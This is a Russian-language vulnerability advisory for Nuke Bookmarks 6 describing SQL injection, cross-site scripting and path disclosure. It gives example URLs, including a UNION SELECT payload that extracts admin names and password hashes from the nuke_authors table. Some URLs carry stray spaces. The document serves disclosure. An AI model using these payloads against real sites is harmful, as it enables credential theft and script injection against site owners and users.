Программа: Nuke Bookmarks 6

Обнаруженная уязвимость позволяет
удаленному пользователю произвести XSS
нападение, получить данные об установочной
директории приложения и выполнить
произвольные SQL команды в базе данных
уязвимого приложения.

1. SQL-инъекция существует из-за
недостаточной фильтрации входных данных в
параметре category модуля marks. Удаленный
пользователь может с помощью специально
сформированного URL выполнить произвольные
SQL команды в базе данных уязвимого
приложения.

Пример:

http://[target]/modules.php?name=Bookmarks&file=marks&catname=1
&category=-1/**/union/**/select%200,aid,0,pwd, 0,0%20from%20nuke_authors

2. Межсайтовый скриптинг возможен из-за
недостаточной фильтрации HTML тегов.
Удаленный пользователь может создать
специально сформированный URL и выполнить
произвольный HTML сценарий в браузере жертвы
в контексте безопасности уязвимого сайта.

Пример:

http://[target]/modules.php?name=Bookmarks&file= del_cat&catname=[htmlco
de]
http://[target]/modules.php?name=Bookmarks&file= del_mark&markname=[htmlcode]
http://[target]/modules.php?name=Bookmarks&file= edit_cat&catname=[htmlcode]
http://[ta rget]/modules.php?name=Bookmarks&file= edit_cat&catcomment=[htmlcode]
http://[target]/modules.php?name=Bookmarks&file= marks&catname=[htmlcode]
http://[target]/modules.ph p?name=Bookmarks&file=
uploadbookmarks&category=[htmlcode]

3. Удаленный пользователь может получить
данные об установочной директории
приложения из-за недостаточной обработки
входных данных в некоторых параметрах
модуля marks.

Пример:

http://[target]/modules.php?name= Bookmarks&fil e=marks
http://[target]/modules.php?name= Bookmarks&file=marks&category=1\'

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии